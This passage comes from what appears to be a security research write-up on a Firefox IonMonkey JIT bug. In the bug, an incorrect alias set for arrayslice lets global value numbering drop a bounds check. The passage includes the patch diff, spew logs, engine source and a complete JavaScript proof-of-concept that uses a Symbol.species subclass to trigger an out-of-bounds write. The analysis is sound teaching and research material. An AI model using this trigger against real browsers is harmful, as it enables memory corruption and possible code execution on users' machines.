bool appendRoots(MRootList& roots) const override {
return roots.append(templateObj_);
}
};

class MArrayJoin : public MBinaryInstruction,
public MixPolicy<ObjectPolicy<0>, StringPolicy<1>>::Data {
@@ -9660,17 +9657,18 @@ class MCallGetProperty : public MUnaryIn
// Constructors need to perform a GetProp on the function prototype.
// Since getters cannot be set on the prototype, fetching is non-effectful.
// The operation may be safely repeated in case of bailout.
void setIdempotent() { idempotent_ = true; }
AliasSet getAliasSet() const override {
if (!idempotent_) {
return AliasSet::Store(AliasSet::Any);
}
-    return AliasSet::None();
+    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
+                          AliasSet::DynamicSlot);
}
bool possiblyCalls() const override { return true; }
bool appendRoots(MRootList& roots) const override {
return roots.append(name_);
}
};

// Inline call to handle lhs[rhs]. The first input is a Value so that this


The instructions that don't define any refinements inherit the default behavior from js::jit::MDefinition::getAliasSet (both jit::MInstruction and jit::MPhi nodes inherit jit::MDefinition):

virtual AliasSet getAliasSet() const {
// Instructions are effectful by default.
return AliasSet::Store(AliasSet::Any);
}


Just one more thing before getting back into Ion; here is the PoC file I use if you would like to follow along at home:

let Trigger = false;
let Arr = null;
let Spray = [];

function Target(Special, Idx, Value) {
Arr[Idx] = 0x41414141;
Special.slice();
Arr[Idx] = Value;
}

class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
gc();
};
}
};

function main() {
const Snowflake = new SoSpecial();
Arr = new Array(0x7e);
for(let Idx = 0; Idx < 0x400; Idx++) {
Target(Snowflake, 0x30, Idx);
}

Trigger = true;
Target(Snowflake, 0x20, 0xBBBBBBBB);
}

main();


It’s usually a good idea to compare the behavior of the patched component before and after the fix. The below shows the summary of the alias analysis pass without the fix and with it (alias-sum spew channel):

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


What you quickly notice is that in the fixed version there are a bunch of new load / store dependencies against the .slice statement (which translates to an arrayslice MIR instruction). As we can see in the fix for this issue, the developer basically disabled any alias set refinement and basically opt-ed out the arrayslice instruction off the alias analysis. If we take a look at the MIR graph of the Target function on a vulnerable build that is what we see (on pass#9 Alias analysis and on pass#10 GVN):

Let's first start with what the MIR graph looks like after the Alias Analysis pass. The code is pretty straight-forward to go through and is basically broken down into three pieces as the original JavaScript code:

• The first step is to basically load up the Arr variable, converts the index Idx into an actual integer (tonumberint32), gets the length (it's not quite the length but it doesn't matter for now) of the array (initializedLength) and finally ensures that the index is within Arr's bounds.
• Then, it invokes the slice operation (arrayslice) against the Special array passed in the first argument of the function.
• Finally, like in the first step we have another set of instructions that basically do the same but this time to write a different value (passed in the third argument of the function).

This sounds like a pretty fair translation from the original code. Now, let's focus on the arrayslice instruction for a minute. In the previous section we have looked at what the Alias Analysis does and how it does it. In this case, if we look at the set of instructions coming after the 27 | arrayslice unbox9:Object constant24:Int32 arraylength26:Int32 we do not see another instruction that loads anything related to the unbox9:Object and as a result it means all those other instructions have no dependency to the slice operation. In the fixed version, even though we get the same MIR code, because the alias set for the arrayslice instruction is now Store(Any) combined with the fact that GetObject instead of grabbing its first operand it returns null, this makes genericMightAlias returns Alias::MayAlias. If the engine cannot prove no aliasing then it stays conservative and creates a dependency. That’s what explains this part in the alias-sum channel for the fixed version:

...
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27


Now looking at the graph after the GVN pass has executed we can start to see that the graph has been simplified / modified. One of the things that sounds pretty natural, is to basically eliminate a good part of the green block as it is mostly a duplicate of the blue block, and as a result only the storeelement instruction is conserved. This is safe based on the assumption that Arr cannot be changed in between. Less code, one bound check instead of two is also a good thing for code size and runtime performance which is Ion's ultimate goal.

At first sight, this might sound like a good and safe thing to do. JavaScript being JavaScript though, it turns out that if an attacker subclasses Array and provides an implementation for [Symbol.Species], it can redefine the ctor of the Array object. That coupled with the fact that slicing a JavaScript array results in a newly built array, you get the opportunity to do badness here. For example, we can set Arr's length to zero and because the bounds check happens only at the beginning of the function, we can modify its length after the 19 | boundscheck and before 36 | storeelement. If we do that, 36 effectively gives us the ability to write an Int32 out of Arr's bounds. Beautiful.

Implementing what is described above is pretty easy and here is the code for it:

let Trigger = false;
class SoSpecial extends Array {
static get [Symbol.species]() {
return function() {
if(!Trigger) {
return;
}

Arr.length = 0;
};
}
};


The Trigger variable allows us to control the behavior of SoSpecial's ctor and decide when to trigger the resizing of the array.

One important thing that we glossed over in this section is the relationship between the alias analysis results and how those results are consumed by the GVN pass. So as usual, let’s pop the hood and have a look at what actually happens :).

### Global Value Numbering

The pass that follows Alias Analysis in Ion’s pipeline is the Global Value Numbering. (abbreviated GVN) which is implemented in the ValueNumbering.cpp file:

  // Optimize the graph, performing expression simplification and
// canonicalization, eliminating statically fully-redundant expressions,
// deleting dead instructions, and removing unreachable blocks.
MOZ_MUST_USE bool run(UpdateAliasAnalysisFlag updateAliasAnalysis);


The interesting part in this comment for us is the eliminating statically fully-redundant expressions part because what if we can have it incorrectly eliminate a supposedly redundant bounds check for example?

The pass itself isn’t as small as the alias analysis and looks more complicated. So we won’t follow the algorithm line by line like above but instead I am just going to try to give you an idea of the type of modification of the graph it can do. And more importantly, how does it use the dependencies established in the previous pass. We are lucky because this optimization pass is the only pass documented on Mozilla’s wiki which is great as it’s going to simplify things for us: IonMonkey/Global value numbering.

By reading the wiki page we learn a few interesting things. First, each instruction is free to opt-into GVN by providing an implementation for congruentTo and foldsTo. The default implementations of those functions are inherited from js::jit::MDefinition:

virtual bool congruentTo(const MDefinition* ins) const { return false; }
MDefinition* MDefinition::foldsTo(TempAllocator& alloc) {
// In the default case, there are no constants to fold.
return this;
}


The congruentTo function evaluates if the current instruction is identical to the instruction passed in argument. If they are it means one can be eliminated and replaced by the other one. The other one gets discarded and the MIR code gets smaller and simpler. This is pretty intuitive and easy to understand. As the name suggests, the foldsTo function is commonly used (but not only) for constant folding in which case it computes and creates a new MIR node that it returns. In default case, the implementation returns this which doesn’t change the node in the graph.

Another good source of help is to turn on the gvn spew channel which is useful to follow the code and what it does; here’s what it looks like:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
[GVN]       Recording Constant4
[GVN]       Replacing Constant5 with Constant4
[GVN]       Replacing Constant8 with Constant4
[GVN]       Recording Unbox9
[GVN]       Recording Unbox10
[GVN]       Recording Unbox11
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording Constant24
[GVN]       Recording Elements25
[GVN]       Recording ArrayLength26
[GVN]       Replacing Constant28 with Constant12
[GVN]       Replacing Slots29 with Slots13
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Replacing Elements32 with Elements17
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Recording Box37


At a high level, the pass iterates through the various instructions of our block and looks for opportunities to eliminate redundancies (congruentTo) and folds expressions (foldsTo). The logic that decides if two instructions are equivalent is in js::jit::ValueNumberer::VisibleValues::ValueHasher::match:

// Test whether two MDefinitions are congruent.
bool ValueNumberer::VisibleValues::ValueHasher::match(Key k, Lookup l) {
// If one of the instructions depends on a store, and the other instruction
// does not depend on the same store, the instructions are not congruent.
if (k->dependency() != l->dependency()) {
return false;
}
bool congruent =
k->congruentTo(l);  // Ask the values themselves what they think.
#ifdef JS_JITSPEW
if (congruent != l->congruentTo(k)) {
JitSpew(
JitSpew_GVN,
"      congruentTo relation is not symmetric between %s%u and %s%u!!",
k->opName(), k->id(), l->opName(), l->id());
}
#endif
return congruent;
}


Before invoking the instructions’ congruentTo implementation the algorithm verifies if the two instructions share the same dependency. This is this very line that ties together the alias analysis result and the global value numbering optimization; pretty exciting uh :)?.

To understand what is going on well we need two things: the alias summary spew to see the dependencies and the MIR code before the GVN pass has run. Here is the alias summary spew from vulnerable version:

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6


And here is the MIR code:

On this diagram I have highlighted the two code regions that we care about. Those two regions are the same which makes sense as they are the MIR code generated by the two statements Arr[Idx] = .. / Arr[Idx] = .... The GVN algorithm iterates through the instructions and eventually evaluates the first 19 | boundscheck instruction. Because it has never seen this expression it records it in case it encounters a similar one in the future. If it does, it might choose to replace one instruction with the other. And so it carries on and eventually hit the other 34 | boundscheck instruction. At this point, it wants to know if 19 and 34 are congruent and the first step to determine that is to evaluate if those two instructions share the same dependency. In the vulnerable version, as you can see in the alias summary spew, those instructions have all the same dependency to start6 which the check is satisfied. The second step is to invoke MBoundsCheck implementation of congruentTo that ensures the two instructions are the same.

  bool congruentTo(const MDefinition* ins) const override {
if (!ins->isBoundsCheck()) {
return false;
}
const MBoundsCheck* other = ins->toBoundsCheck();
if (minimum() != other->minimum() || maximum() != other->`